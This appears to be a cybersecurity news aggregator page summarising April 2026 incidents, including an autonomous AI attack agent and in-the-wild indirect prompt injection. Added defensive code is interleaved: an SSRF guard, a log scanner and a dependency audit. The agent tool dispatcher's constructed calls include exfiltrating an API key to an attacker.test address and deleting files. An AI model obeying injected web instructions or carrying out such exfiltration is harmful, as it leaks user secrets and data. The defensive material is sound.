CyberHappenings

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

News Summary

Last updated: 10:01 23/04/2026 UTC
Last updated: 08:45 23/04/2026 UTC
  • Unauthenticated RCE vulnerability in Apache ActiveMQ Classic via Jolokia API (CVE-2026-34197) CVE-2026-34197, an unauthenticated remote code execution vulnerability reachable through the Jolokia API in Apache ActiveMQ Classic, remains under active exploitation, with at least 6,400 exposed servers still vulnerable. The flaw affects versions prior to 5.19.4 and 6.0.0 through 6.2.3; patched releases were issued on March 30, 2026. Discovered by Horizon3’s Naveen Sunkavally with AI assistance, the vulnerability chain lets an attacker execute arbitrary OS commands by abusing the Jolokia API’s addNetworkConnector operation. CISA added the flaw to its Known Exploited Vulnerabilities catalog on April 16, 2026 and ordered FCEB agencies to remediate by April 30, 2026 under BOD 22-01. Exploitation indicators include broker log entries showing vm:// transport connections whose brokerConfig=xbean:http:// query parameter points at a remote configuration, along with configuration warnings. Shadowserver counts over 7,500 exposed ActiveMQ servers, of which roughly 6,400 remain vulnerable, concentrated in Asia, North America, and Europe.
  • Salesforce misconfiguration leads to data exposure at McGraw-Hill amid ShinyHunters extortion claims McGraw-Hill confirmed a data breach affecting 13.5 million user accounts after ShinyHunters exploited a Salesforce environment misconfiguration to steal and leak data the company describes as non-sensitive: names, addresses, phone numbers, and email addresses. The company stated the breach did not affect its core Salesforce accounts, customer databases, courseware, or internal systems, while ShinyHunters claimed to hold 45 million records containing PII. The affected web pages were secured promptly, and McGraw-Hill is working with Salesforce to remediate the issue. Have I Been Pwned verified the leak of over 100 GB of data tied to 13.5 million accounts. The incident is distinct from a separate, unverified claim by a threat actor posing as ShinyHunters, who alleges breaching Vercel and selling stolen data including API keys and employee records. Vercel has disclosed that incident and is investigating with law enforcement and incident response experts, while denying any impact to its services.
  • RapperBot botnet administrator charged in the U.S. The RapperBot botnet, allegedly operated by Ethan Foltz, has been disrupted as part of the broader international Operation PowerOFF, which has now identified over 75,000 DDoS-for-hire users and taken down 53 domains across 21 countries. The operation, supported by Europol, has led to four arrests and the dismantling of illegal booter services, and is moving into a prevention phase to curb future misuse. RapperBot has been responsible for over 370,000 DDoS attacks on victims in more than 80 countries since 2021, primarily targeting U.S. government systems, major media platforms, gaming companies, and large tech firms. The botnet, also known as Eleven Eleven Botnet and CowBot, infected DVRs and Wi-Fi routers to launch attacks and mine Monero; a cryptomining module was added in 2023. Foltz was charged with aiding and abetting computer intrusions, and the botnet’s command-and-control infrastructure was seized in August 2025. Attacks reached several terabits per second and more than 1 billion packets per second, with the largest exceeding 6 Tbps. Operation PowerOFF’s latest actions build on prior phases that dismantled key infrastructure and seized databases holding over 3 million criminal accounts.
  • Ransomware extortion totals $2.1B from 2022 to 2024, FinCEN reports FinCEN’s report finds that ransomware gangs extorted over $2.1 billion from 2022 to 2024, with a peak in 2023 followed by a decline in 2024 attributed to law enforcement actions against major gangs such as ALPHV/BlackCat and LockBit. The report details 4,194 ransomware incidents, with manufacturing, financial services, and healthcare the most targeted industries. The top ransomware families, including Akira, ALPHV/BlackCat, and LockBit, were responsible for the majority of attacks and ransom payments, with Bitcoin the primary payment method. Separately, former ransomware negotiator Angelo Martino has pleaded guilty to conspiring with BlackCat (ALPHV) operators to extort U.S. companies in 2023. Martino, together with accomplices Kevin Tyler Martin and Ryan Goldberg, deployed BlackCat ransomware, shared confidential victim information to maximize ransom demands, and laundered the proceeds. Authorities seized $10 million in assets from Martino; his co-defendants pleaded guilty in December 2025.
  • Pre-authenticated RCE in Marimo exploited within 10 hours of advisory A pre-authentication remote code execution (RCE) vulnerability in Marimo, tracked as CVE-2026-39987 (CVSS 9.3), was exploited in the wild within hours of public disclosure, giving attackers full PTY shells on exposed instances via the unauthenticated /terminal/ws WebSocket endpoint. The flaw, affecting Marimo versions prior to 0.23.0, initially drove rapid, human-operated exploitation focused on credential theft. Later attacks expanded to deploy a new NKAbuse malware variant hosted on Hugging Face Spaces, using typosquatted repositories to evade detection and establish persistent remote access. Additional activity includes lateral movement via reverse shells and database enumeration, indicating a shift toward multi-stage attacks beyond initial credential harvesting. Threat actors validated the vulnerability within seconds, harvested credentials in under three minutes, and conducted reconnaissance from 125 IP addresses within the first 12 hours after disclosure. GitHub assessed the flaw at a critical CVSS score of 9.3, and Marimo’s developers confirmed impact on instances deployed as editable notebooks or exposed via --host 0.0.0.0 in edit mode.
  • Phishing campaign abuses Apple account notifications to send emails from Apple servers A phishing campaign continues to abuse Apple’s legitimate infrastructure to deliver callback phishing emails, now exploiting Apple account change notifications to embed fake purchase alerts. Scammers insert phishing text into Apple ID personal information fields, which Apple then includes in the security alerts it sends to users. The emails originate from Apple’s servers ([email protected]), pass SPF, DKIM, and DMARC checks, and are distributed through Apple’s mailing infrastructure, so they bypass spam filters and appear legitimate. The messages mimic iPhone purchase notifications via PayPal, claim charges of $899, and prompt recipients to call a provided number to cancel the transaction. The aim is to talk victims into granting remote access to their computers, enabling theft of funds, deployment of malware, or data theft. The campaign is an evolution of earlier tactics that abused iCloud Calendar invites to send phishing emails from Apple’s servers. Users are advised to treat unexpected account alerts with caution, especially those claiming unauthorized purchases or urging calls to support numbers, particularly if they did not initiate any recent account changes.

Latest updates


Sustained 63% annual increase in cyber-attacks against global education sector over 2023–2025

Updated: · First: 23.04.2026 13:30 · 📰 1 src / 1 articles

Between November 2023 and October 2025, cyber-attacks on schools and universities worldwide rose 63% year-over-year, driven by geopolitical tensions, ransomware, and hacktivism, according to threat intelligence analyzed by Quorum Cyber. Data breaches increased 73%, hacktivist activity 75%, and ransomware incidents 21% across 67 countries. Research-intensive institutions face targeted theft of AI, quantum, and advanced materials data, while hacktivist campaigns—including Iranian-affiliated actors—conduct DDoS, defacement, and data-leak operations.

Autonomous AI agent Zealot demonstrates end-to-end cloud breach capability in GCP environment

Updated: · First: 23.04.2026 13:09 · 📰 1 src / 1 articles

Unit 42 at Palo Alto Networks has demonstrated an autonomous AI agent, named Zealot, capable of executing end-to-end attacks against a Google Cloud Platform (GCP) environment with minimal human oversight. Zealot operated under an open-ended objective to exfiltrate sensitive data from a targeted BigQuery dataset in an isolated GCP lab environment. Using a supervisor-agent architecture with three specialized sub-agents, the system autonomously performed reconnaissance, exploited a web application to steal credentials, escalated privileges, and extracted data while improvising evasion tactics such as injecting SSH keys for persistence. The findings underscore a shift toward AI-driven offensive operations, revealing that current human-centric detection paradigms may be insufficient to counter machine-speed intrusions.

Autonomous multi-agent AI framework demonstrates end-to-end cloud attack execution in under three minutes

Updated: · First: 23.04.2026 13:00 · 📰 1 src / 1 articles

Security researchers demonstrated a self-directed AI system capable of executing a full cloud attack chain from initial access to data exfiltration in under three minutes, using only a single natural-language prompt and exploiting existing misconfigurations. The autonomous multi-agent framework, named Zealot, autonomously chained reconnaissance, exploitation, privilege escalation, and data theft by leveraging common cloud weaknesses such as server-side request forgery, exposed metadata services, and permissive storage bucket policies. The experiment, conducted in a deliberately misconfigured Google Cloud Platform environment, highlights that current large language models (LLMs) can automate complex attack sequences faster than human defenders can respond, reducing the operational window for mitigation to minutes rather than hours or days.
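The step both Zealot write-ups hinge on is server-side request forgery reaching the instance metadata service. The following is an added example, not code from Unit 42 or from the page, showing a vulnerable server-side URL fetcher beside a hardened one. Network I/O is injected (an `opener` callable and a `resolve` callable) so it runs offline; in production `resolve` would be `socket.getaddrinfo`. It assumes the application fetches user-supplied URLs from inside the VPC and that the metadata service answers at 169.254.169.254 (on GCP also under the name metadata.google.internal); the hostnames in `FAKE_DNS` are constructed.

```python
"""Added example, not code from Unit 42 or the page: the SSRF-to-metadata step
that the Zealot write-up chains, shown as a vulnerable server-side fetcher
beside a hardened one. Network I/O is injected (`opener`, `resolve`) so the
example runs offline; in production `resolve` would be socket.getaddrinfo.

Assumptions (mine): the application fetches user-supplied URLs from inside the
VPC; the instance metadata service answers at 169.254.169.254 and, on GCP,
under the name metadata.google.internal. Hostnames in FAKE_DNS are constructed.
"""
import ipaddress
import socket
from typing import Callable, Iterable, Optional
from urllib.parse import urlsplit

METADATA_NAMES = {"metadata.google.internal", "metadata"}
BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "100.64.0.0/10",
    "::1/128", "fc00::/7", "fe80::/10",
)]

Resolver = Callable[[str], Iterable[str]]


def system_resolve(host: str) -> Iterable[str]:
    # Resolves names and also numeric spellings such as 2852039166 or
    # 0xa9fea9fe, so the address check sees the real target, not the text.
    return {ai[4][0] for ai in socket.getaddrinfo(host, None)}


def vulnerable_fetch(url: str, opener: Callable[[str], bytes]) -> bytes:
    # The "before": whatever the caller supplies is fetched with the
    # service's network position and, via the metadata service, its identity.
    return opener(url)


def check_target(url: str, resolve: Resolver = system_resolve) -> Optional[str]:
    """Return None if the URL may be fetched, otherwise the refusal reason."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return f"scheme {parts.scheme!r} not allowed"
    host = (parts.hostname or "").lower()
    if not host:
        return "missing host"
    if host in METADATA_NAMES or host.endswith(".internal"):
        return f"metadata name {host}"
    try:
        addrs = list(resolve(host))
    except OSError as exc:
        return f"resolution failed: {exc}"
    if not addrs:
        return "no addresses"
    for addr in addrs:
        ip = ipaddress.ip_address(addr)
        mapped = getattr(ip, "ipv4_mapped", None)   # ::ffff:169.254.169.254
        if mapped is not None:
            ip = mapped
        if any(ip in net for net in BLOCKED_NETS):
            return f"{host} resolves to non-public address {ip}"
    return None


def hardened_fetch(url: str, opener: Callable[[str], bytes],
                   resolve: Resolver = system_resolve) -> bytes:
    reason = check_target(url, resolve)
    if reason:
        raise PermissionError(reason)
    # Assumed: `opener` does not follow redirects (or re-runs check_target on
    # each hop) and connects to the address that was checked, so a public name
    # cannot bounce or rebind the request to 169.254.169.254.
    return opener(url)


# Constructed resolver table standing in for DNS.
FAKE_DNS = {
    "example.com": ["93.184.216.34"],
    "cdn.attacker.test": ["169.254.169.254"],   # public name aimed at metadata
}


def fake_resolve(host: str) -> Iterable[str]:
    if host in FAKE_DNS:
        return FAKE_DNS[host]
    try:
        return [str(ipaddress.ip_address(host))]   # numeric host literal
    except ValueError:
        raise OSError(f"unknown host {host}")


if __name__ == "__main__":
    fake_opener = lambda url: b"<service-account token would be here>"
    probe = "http://169.254.169.254/computeMetadata/v1/instance/service-accounts/"
    print("vulnerable:", vulnerable_fetch(probe, fake_opener))
    for u in (probe, "http://cdn.attacker.test/", "http://[::ffff:169.254.169.254]/",
              "file:///etc/passwd", "https://example.com/report.pdf"):
        print(u, "->", check_target(u, fake_resolve) or "allowed")
```

The check is applied to resolved addresses rather than to the URL text, which is what defeats decimal, hex, and IPv4-mapped spellings of the metadata address; the remaining gap, DNS rebinding between check and connect, is closed only if the HTTP client connects to the address that was checked, which is why the hardened path states that assumption about `opener`.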

Indirect prompt injection payloads exploited in-the-wild against AI agents

Updated: · First: 23.04.2026 12:30 · 📰 1 src / 1 articles

Security researchers reported 10 new indirect prompt injection (IPI) payloads being exploited in-the-wild, enabling threat actors to execute malicious instructions via web content poisoning. The attacks target AI agents that process web content for summarization, retrieval-augmented generation (RAG), metadata extraction, ad review, SEO analysis, or moderation. Impact scales with agent privileges, from low-risk summarizers to high-impact agentic tools capable of emailing, executing shell commands, or processing payments. Payloads observed include content suppression, attribution hijacking, forced file deletion, API key exfiltration, and financial fraud via embedded payment instructions.
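Because the page's point is that impact scales with what the agent is allowed to do, the practical control is not spotting the injected sentence but bounding what a tool call can do once the model has read untrusted content. The following is an added example of that dispatcher pattern; it is mine, not the researchers' code. It assumes the orchestrator records, for every proposed tool call, whether untrusted content (fetched pages, RAG chunks, ad creatives) was in the model's context; the tool names, roles and the credential-shaped argument heuristic are hypothetical, and the sample calls are constructed.

```python
"""Added example (mine, not the researchers' code): a tool dispatcher that caps
what an AI agent can do with an instruction that may have come from untrusted
web content. It does not try to recognise the injection text; it bounds the
blast radius by agent role and by the provenance of the model's context.

Assumptions: the orchestrator records for every proposed tool call whether
untrusted content (fetched pages, RAG chunks, ad creatives) was in the model's
context; the tool names, roles and secret-shaped argument heuristic below are
hypothetical. The sample calls are constructed.
"""
import re
from dataclasses import dataclass
from enum import Enum
from typing import Any, Dict, Set


class Risk(Enum):
    READ = 1          # no side effects
    WRITE = 2         # mutates agent-owned state only
    IRREVERSIBLE = 3  # email, shell, deletion, payments


TOOL_RISK: Dict[str, Risk] = {
    "search": Risk.READ, "read_file": Risk.READ,
    "write_note": Risk.WRITE,
    "send_email": Risk.IRREVERSIBLE, "run_shell": Risk.IRREVERSIBLE,
    "delete_file": Risk.IRREVERSIBLE, "make_payment": Risk.IRREVERSIBLE,
}
# Least privilege per role: a summariser never gets an outbound channel.
ROLE_TOOLS: Dict[str, Set[str]] = {
    "summarizer": {"search", "read_file"},
    "ops_assistant": {"search", "read_file", "write_note", "send_email",
                      "run_shell", "delete_file"},
    "payments_agent": {"search", "make_payment"},
}
# Heuristic (assumption): argument values shaped like credentials must never
# leave through a side-effecting tool, whatever the provenance.
SECRET_SHAPED = re.compile(r"(?i)\b(api[_-]?key|secret|token|password)\b\s*[:=]\s*\S{8,}")


@dataclass(frozen=True)
class ToolCall:
    role: str
    tool: str
    args: Dict[str, Any]
    tainted: bool  # untrusted content was in context when this was proposed


@dataclass(frozen=True)
class Decision:
    action: str  # "execute" | "deny" | "confirm"
    reason: str


def decide(call: ToolCall) -> Decision:
    granted = ROLE_TOOLS.get(call.role, set())
    if call.tool not in granted:
        return Decision("deny", f"{call.tool} is not granted to role {call.role}")
    risk = TOOL_RISK[call.tool]
    if risk is not Risk.READ:
        blob = " ".join(f"{k}={v}" for k, v in call.args.items())
        if SECRET_SHAPED.search(blob):
            return Decision("deny", "credential-shaped data in side-effecting call")
    if call.tainted and risk is Risk.IRREVERSIBLE:
        return Decision("confirm", "irreversible action proposed while untrusted "
                                   "content was in context; needs a human")
    return Decision("execute", "within role grant and provenance policy")


def dispatch(call: ToolCall, registry: Dict[str, Any]) -> str:
    d = decide(call)
    if d.action != "execute":
        return f"{d.action}: {d.reason}"
    return registry[call.tool](**call.args)


# Constructed calls modelling the payload classes the page lists.
SAMPLES = [
    ToolCall("summarizer", "send_email", {"to": "x@attacker.test", "body": "..."}, True),
    ToolCall("ops_assistant", "delete_file", {"path": "/srv/reports/q1.xlsx"}, True),
    ToolCall("ops_assistant", "send_email",
             {"to": "x@attacker.test", "body": "API_KEY=sk-live-0123456789abcdef"}, False),
    ToolCall("payments_agent", "make_payment", {"iban": "XX00 0000", "amount": 4900}, True),
    ToolCall("ops_assistant", "write_note", {"text": "summary of page"}, True),
]

if __name__ == "__main__":
    registry = {t: (lambda **kw: "ran " + repr(kw)) for t in TOOL_RISK}
    for c in SAMPLES:
        print(c.role, c.tool, "->", dispatch(c, registry))
```

The ordering matters: role grants are checked first so a summarizer's "send this to x@attacker.test" is simply not a capability it has, then the secret heuristic, and only then the taint rule, so an ops assistant still runs untainted irreversible actions without friction but is stopped for confirmation the moment an instruction may have originated in a page it was asked to read.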

GopherWhisper APT compromises Mongolian government systems with Go-based backdoors via Discord, Slack, and Office 365

Updated: · First: 23.04.2026 12:04 · 📰 1 src / 1 articles

A previously undocumented China-aligned APT group named GopherWhisper has compromised at least 12 systems across Mongolian governmental institutions using a suite of Go-based backdoors and loaders. The threat actor abuses legitimate services—Discord, Slack, Microsoft 365 Outlook, and file.io—for command-and-control (C2) communications and data exfiltration. Initial access vectors remain undisclosed, but post-compromise activity includes lateral movement, data collection, and persistent remote access. Operational activity aligns with China Standard Time, with C2 traffic primarily occurring during standard working hours, suggesting human operator involvement.

iOS notification logging flaw enabling recovery of deleted Signal chat previews patched by Apple

Updated: · First: 23.04.2026 11:50 · 📰 1 src / 1 articles

Apple released iOS/iPadOS updates (26.4.2, 18.7.8) to remediate CVE-2026-28950, a logging issue that retained deleted message previews in system cache despite user deletion and application uninstallation. The flaw allowed forensic recovery of Signal chat previews via cached notifications, affecting iPhone and iPad models from iPhone XR through iPhone 16 series and iPad mini (5th gen) to iPad Pro 13-inch (M4). Apple did not disclose exploitation status but subsequent reporting indicated the flaw was exploited by law enforcement in the Prairieland case to extract deleted Signal messages. Apple’s update improves data redaction to prevent notification previews from persisting after deletion or uninstallation.

UK NCSC endorses passkeys as primary consumer authentication method

Updated: · First: 23.04.2026 11:45 · 📰 1 src / 1 articles

The UK National Cyber Security Centre (NCSC) has officially designated passkeys as the preferred consumer authentication method, urging adoption by businesses and the public. Previously reserved for scenarios where passkeys are unavailable, passwords are now deprecated as a primary login option. The endorsement follows a year-long collaboration with the FIDO Alliance and observed success in deployments such as the NHS. The move aims to reduce reliance on passwords by promoting passkeys, which leverage FIDO2 and WebAuthn standards for phishing-resistant, biometric, or device-based authentication. The UK government has also committed to rolling out passkeys across all public digital services.

Active Mirai botnet recruitment via CVE-2025-29635 in end-of-life D-Link routers

Updated: · First: 22.04.2026 23:04 · 📰 1 src / 1 articles

A Mirai-based malware campaign is actively exploiting CVE-2025-29635, a high-severity command-injection vulnerability in end-of-life D-Link DIR-823X routers, to recruit devices into a botnet. The flaw enables unauthenticated remote code execution (RCE) via a POST request to the /goform/set_prohibiting endpoint, allowing attackers to download and execute a Mirai variant named "tuxnokill" that supports multiple architectures. The campaign was detected by Akamai SIRT in early March 2026, marking the first observed in-the-wild exploitation despite the vulnerability’s public disclosure 13 months prior. The affected firmware versions (240126 and 24082) were end-of-life in November 2024, and no patches are expected from D-Link. The threat actor also exploits vulnerabilities in TP-Link (CVE-2023-1389) and ZTE routers using the same attack pattern, deploying Mirai payloads consistently across targets.
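The D-Link entry above and the ActiveMQ entry in the News Summary each name a concrete exploitation indicator (a POST to /goform/set_prohibiting; a vm:// transport whose brokerConfig=xbean:http:// parameter loads a remote configuration). The following is an added example, not code from Akamai, Horizon3 or the page, that turns both indicators into rules run over log lines. It assumes the ActiveMQ indicator is any vm:// URI whose brokerConfig is an xbean: reference to a remote http(s) URL (a local xbean:file:... reference is normal) and that the D-Link indicator shows up in an HTTP access log in front of the router; every sample log line is constructed.

```python
"""Added example (not from Horizon3, Akamai, or the page's sources): match log
lines against the two exploitation indicators the page names, for
CVE-2026-34197 (ActiveMQ broker logs) and CVE-2025-29635 (HTTP access logs in
front of a D-Link DIR-823X).

Assumptions (mine): the ActiveMQ indicator is any vm:// URI whose brokerConfig
parameter is an xbean: reference to a remote http(s) URL (a local
xbean:file:... reference is normal); the D-Link indicator is a POST to
/goform/set_prohibiting. All sample log lines are constructed.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional
from urllib.parse import parse_qs, urlparse


@dataclass(frozen=True)
class Hit:
    rule: str
    cve: str
    line_no: int
    evidence: str


# vm:// transport URI as it appears in ActiveMQ log output, up to whitespace
# or a quote.
VM_URI = re.compile(r"vm://[^\s\"']+")
# Unauthenticated command injection endpoint on the end-of-life router.
DLINK_POST = re.compile(r"\bPOST\s+/goform/set_prohibiting\b")


def activemq_remote_xbean(line: str) -> Optional[str]:
    """Return the offending vm:// URI if brokerConfig points at a remote xbean."""
    for uri in VM_URI.findall(line):
        params = parse_qs(urlparse(uri).query)
        for cfg in params.get("brokerConfig", []):
            if cfg.lower().startswith("xbean:http"):
                return uri
    return None


def scan(lines: Iterable[str]) -> List[Hit]:
    hits: List[Hit] = []
    for n, line in enumerate(lines, 1):
        uri = activemq_remote_xbean(line)
        if uri:
            hits.append(Hit("activemq-remote-xbean", "CVE-2026-34197", n, uri))
        m = DLINK_POST.search(line)
        if m:
            hits.append(Hit("dlink-set_prohibiting-post", "CVE-2025-29635", n, m.group(0)))
    return hits


SAMPLE_LOGS = [
    # constructed: benign broker start-up using a local xbean file
    "2026-04-16 10:01:02 INFO  Connector vm://localhost?brokerConfig=xbean:file:conf/activemq.xml started",
    # constructed: network connector pointed at an attacker-hosted xbean config
    "2026-04-16 10:05:44 WARN  Establishing network connector vm://localhost?brokerConfig=xbean:http://203.0.113.5/b.xml&create=false",
    # constructed: combined-format access log entries for a DIR-823X
    '203.0.113.9 - - [03/Mar/2026:04:12:55 +0000] "GET /index.html HTTP/1.1" 200 512',
    '198.51.100.7 - - [03/Mar/2026:04:13:01 +0000] "POST /goform/set_prohibiting HTTP/1.1" 200 17',
]

if __name__ == "__main__":
    for h in scan(SAMPLE_LOGS):
        print(f"line {h.line_no}: {h.rule} ({h.cve}) -> {h.evidence}")
```

The ActiveMQ rule parses the vm:// URI rather than grepping for the literal string `xbean:http://`, so it also catches https and mixed-case spellings while leaving the normal local xbean:file: configuration alone; for the router, a match is not a "patch it" finding, since the page notes no fix is coming, but a "replace it" one.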

TeamPCP escalates CanisterWorm campaign with geopolitical targeting and multi-vector attacks

Updated: 22.04.2026 20:55 · First: 21.03.2026 09:28 · 📰 10 src / 17 articles

TeamPCP has escalated its multi-vector CanisterWorm campaign into a geopolitically targeted operation, compromising trusted PyPI packages (LiteLLM versions 1.82.7–1.82.8 and Telnyx versions 4.87.1–4.87.2) to deliver credential-stealing malware that harvests SSH keys, cloud credentials, Kubernetes secrets, database credentials, cryptocurrency wallets, TLS/SSL private keys, and bash history files. The malware exfiltrates stolen data to attacker-controlled infrastructure and establishes persistent backdoors, with evidence linking TeamPCP to the Vectr ransomware group for follow-on operations. The campaign began as a supply-chain attack involving 47 compromised npm packages and escalated to include GitHub repository hijacking (e.g., Aqua Security), Docker Hub compromise, and direct targeting of CI/CD pipelines via GitHub Actions workflows (e.g., Checkmarx, Trivy). Recent compromises of LiteLLM and Telnyx demonstrate rapid iteration and maturation of supply-chain attack methodology, while destructive payloads targeting Iranian systems in Kubernetes environments (e.g., time-zone/locale-based wipers) highlight the group’s geopolitical alignment. The LiteLLM compromise specifically turned developer endpoints into systematic credential harvesting operations, with malware activating during installation/updates and cascading through transitive dependencies (e.g., dspy, opik) to affect organizations that never directly used LiteLLM. A coordinated attack on Checkmarx ecosystems has been discovered, including malicious images pushed to the official "checkmarx/kics" Docker Hub repository (v2.1.20, alpine overwritten; v2.1.21 introduced) and infected Visual Studio Code extensions (1.17.0, 1.19.0) that executed remote addons via Bun without user consent. The malware collected and exfiltrated sensitive data from infrastructure-as-code scans, exposing credentials in Terraform, CloudFormation, or Kubernetes configurations. Techniques and exfiltration infrastructure (e.g., ICP canister cjn37-uyaaa-aaaac-qgnva-cai.raw.icp0.io) resemble TeamPCP's CanisterWorm operations, though attribution remains unconfirmed. The Docker Hub repository has been archived, and affected organizations must remediate potentially compromised secrets.
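The entry names specific compromised PyPI releases and Docker Hub tags, and stresses that the PyPI ones arrive transitively through packages like dspy and opik. The following is an added example, not code from the page or any vendor it names, that audits a dependency inventory against those identifiers. It assumes Python dependencies arrive as pip-freeze or requirements-lock lines (name==version), which already flatten transitive pulls, and container references as Dockerfile FROM lines; the checkmarx/kics tags are matched by prefix so variants such as v2.1.20-alpine are caught as well. The sample inventory is constructed.

```python
"""Added example, not code from the page or from any vendor named in it: audit a
dependency inventory against the package versions and image tags the page
reports as compromised in the CanisterWorm campaign.

Assumptions (mine): Python dependencies arrive as pip-freeze / requirements
lock lines (name==version), which already include transitive pulls such as
dspy or opik bringing in litellm; container references arrive as Dockerfile
FROM lines; the checkmarx/kics tags are matched by prefix so variants such as
v2.1.20-alpine are caught too. The sample inventory is constructed.
"""
import re
from typing import Dict, Iterable, List, Set, Tuple

# From the page: PyPI releases reported as backdoored.
COMPROMISED_PYPI: Dict[str, Set[str]] = {
    "litellm": {"1.82.7", "1.82.8"},
    "telnyx": {"4.87.1", "4.87.2"},
}
# From the page: tags pushed to the official checkmarx/kics Docker Hub repo.
COMPROMISED_IMAGE_TAGS: Dict[str, Tuple[str, ...]] = {
    "checkmarx/kics": ("v2.1.20", "v2.1.21"),
}

PIN = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)\s*==\s*([0-9][0-9A-Za-z.+-]*)")
FROM_LINE = re.compile(r"^\s*FROM\s+(?:--platform=\S+\s+)?([^\s:@]+)(?::([^\s@]+))?", re.I)


def normalize(name: str) -> str:
    # PEP 503 name normalisation, as pip applies it: case-fold and collapse
    # runs of '-', '_' and '.' into a single '-'.
    return re.sub(r"[-_.]+", "-", name).lower()


def audit_requirements(lines: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (name, version) pairs pinned to a compromised release."""
    flagged = []
    for line in lines:
        m = PIN.match(line.split("#", 1)[0])   # ignore trailing comments
        if not m:
            continue
        name, version = normalize(m.group(1)), m.group(2)
        if version in COMPROMISED_PYPI.get(name, set()):
            flagged.append((name, version))
    return flagged


def audit_dockerfile(lines: Iterable[str]) -> List[str]:
    """Return image references whose tag matches a compromised tag."""
    flagged = []
    for line in lines:
        m = FROM_LINE.match(line)
        if not m:
            continue
        repo = m.group(1).lower().removeprefix("docker.io/")
        tag = m.group(2) or "latest"
        bad = COMPROMISED_IMAGE_TAGS.get(repo)
        if bad and tag.startswith(bad):
            flagged.append(f"{repo}:{tag}")
    return flagged


SAMPLE_LOCK = [
    "# constructed pip freeze output from a developer workstation",
    "dspy==2.6.0",
    "LiteLLM==1.82.8   # pulled in transitively by dspy",
    "telnyx==4.87.0",
    "requests==2.32.3",
]
SAMPLE_DOCKERFILE = [
    "# constructed CI image definition",
    "FROM checkmarx/kics:v2.1.20-alpine AS scanner",
    "FROM python:3.12-slim",
]

if __name__ == "__main__":
    print("compromised PyPI pins:", audit_requirements(SAMPLE_LOCK))
    print("compromised images:", audit_dockerfile(SAMPLE_DOCKERFILE))
```

A hit on either list is an incident, not a version bump: the page describes the payload running at install time and harvesting SSH keys, cloud and Kubernetes credentials, and wallet material, so the host that installed the pin and every credential class it held are in scope for rotation. Running the lock-file audit, rather than grepping a top-level requirements.txt, is what catches the transitive case the entry calls out.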

Living-Off-the-Land (LOTL) abuse of native utilities expands to macOS as primary intrusion tactic in enterprise environments

Updated: 22.04.2026 19:30 · First: 01.04.2026 13:58 · 📰 2 src / 2 articles

Threat actors are increasingly leveraging legitimate, native system tools across both Windows and macOS environments to conduct attacks, achieving lateral movement, privilege escalation, and persistence while evading detection. Analysis of over 700,000 high-severity incidents indicates that 84% now involve abuse of trusted utilities—practices known as Living off the Land (LOTL). This shift reduces reliance on malware and exploits, exploiting operational blind spots created by necessary administrative tools. Recent research from Cisco Talos highlights the expansion of LOTL techniques to macOS native features such as Remote Application Scripting (RAS), Spotlight metadata, and Apple Events, enabling covert execution, persistence, and lateral movement. More than 45% of organizations now use macOS in enterprise settings—often holding sensitive credentials, cloud access, and source code—making the platform a high-value target. Attackers abuse RAS to issue remote commands without triggering shell-based monitoring, embed malicious payloads in Finder comments stored as Spotlight metadata, and leverage protocols like SMB, Netcat, Git repositories, TFTP, and SNMP for covert data transfer and movement. The technique remains the dominant intrusion vector, progressing undetected until significant compromise occurs, particularly due to limited visibility into macOS-native behaviors and reliance on legitimate system processes.

Dismantling of major Spanish-language manga piracy platform with $4.7M ad revenue

Updated: · First: 22.04.2026 18:06 · 📰 1 src / 1 articles

Spanish law enforcement dismantled a Spanish-language manga piracy platform that had operated since 2014, making four arrests and seizing assets; the platform’s advertising revenue is put at $4.7M, and over $470,000 in cryptocurrency was seized. The platform provided unauthorized access to copyrighted manga, monetized mainly through aggressive pop-up advertising, including pornographic ads, shown to millions of monthly users worldwide, many of them minors. A coordinated raid in Almería, Spain, uncovered a complex technical infrastructure behind the operation and an in-progress plan to migrate the platform to a new domain to evade enforcement.

Plug-and-play hardware mitigation SilentGlass released to block malicious video interface attacks

Updated: · First: 22.04.2026 18:00 · 📰 1 src / 1 articles

The UK National Cyber Security Centre (NCSC) has publicly released SilentGlass, a plug-and-play hardware device designed to block malicious or unexpected content at the HDMI and DisplayPort interfaces between source devices and monitors. Deployed first on UK government estates and now available globally, SilentGlass is positioned as a low-cost mitigation against attacks leveraging compromised or malicious video streams to exfiltrate data, inject payloads, or pivot into protected networks. The device is approved for use in high-threat environments and is manufactured by Goldilock Labs in partnership with Sony UK.

Self-propagating North Korean job-scam malware spreads via compromised developer projects in software supply chain

Updated: · First: 22.04.2026 17:48 · 📰 1 src / 1 articles

A North Korean state-aligned actor has transformed fake job recruitment scams into a self-propagating supply-chain attack dubbed "Contagious Interview" that infects developer workstations and then silently propagates malicious code through cloned repositories. The campaign, attributed to Void Dokkaebi (aka Famous Chollima), abuses legitimate development workflows by luring developers with fake interviews at crypto and AI firms, then delivering malware via malicious VS Code tasks, hidden .vscode folders, or bundled payloads in fonts/images. Once a developer commits the infected code to GitHub/GitLab/Bitbucket, the repository becomes a Trojan horse that spreads the infection to downstream contributors and forked projects, creating a worm-like chain reaction across the software supply chain. Attackers stage payloads on blockchain networks (Tron, Aptos, Binance Smart Chain) to evade takedowns and target developers’ credentials, crypto wallets, CI/CD pipelines, and production infrastructure. In March 2026 alone, over 750 repositories, 500 VS Code task configurations, and 101 instances of commit-tampering tools were identified as infected, with markers found in repositories used by DataStax and Neutralinojs.

UK government commits £90m to cybersecurity resilience initiatives and launches Cyber Resilience Pledge

Updated: · First: 22.04.2026 17:10 · 📰 1 src / 1 articles

The UK government announced a £90 million ($120 million) investment in cybersecurity resilience, targeting small and medium-sized enterprises (SMEs) to bolster national cyber defense. The funding, revealed at the NCSC's CYBERUK conference on April 22, aims to support SMEs in implementing the Cyber Essentials standard and encourages broader adoption of cybersecurity best practices. A new Cyber Resilience Pledge will be introduced in summer 2026, requiring signatories to elevate cybersecurity to board-level responsibility, enroll in the NCSC’s Early Warning service, and mandate Cyber Essentials certification across supply chains.

Industrialization of vishing operations through Caller-as-a-Service (CaaS) models

Updated: · First: 22.04.2026 17:01 · 📰 1 src / 1 articles

